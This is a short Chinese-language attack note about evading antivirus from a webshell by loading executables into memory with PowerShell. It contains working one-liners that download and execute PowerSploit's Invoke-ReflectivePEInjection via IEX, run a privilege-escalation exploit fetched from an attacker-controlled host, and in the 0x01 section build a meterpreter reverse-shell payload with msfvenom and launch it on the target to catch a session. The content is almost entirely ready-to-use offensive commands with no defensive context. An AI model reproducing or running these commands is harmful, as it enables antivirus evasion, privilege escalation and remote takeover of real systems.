0x00 概述

环境:上传提权的工具直接被杀,可以直接在webshell里面使用powershell加载exe到内存绕过。

https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/

powershell -exec bypass -File Invoke-ReflectivePEInjection.ps1

或者

1

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');"

样例:Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR

1

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://10.10.10.2:8080/ms16-032_x64.exe  -ExeArgs '"whoami"' -ForceASLR"

注意点:32位的程序放到64位系统中执行,需要改成64位,所以将vc的编译选项改为x64,同时MFC的使用改为在静态库中使用MFC(熟悉c++的应该都懂)

0x01 Msf-shell

1.生成一个能被查杀的shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.2 lport=5555 -f exe > test.exe

2.在远程主机上执行powershell命令

1

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://10.10.10.2:8080/test.exe   -ForceASLR"

3.在自己本地开启监听,成功获取会话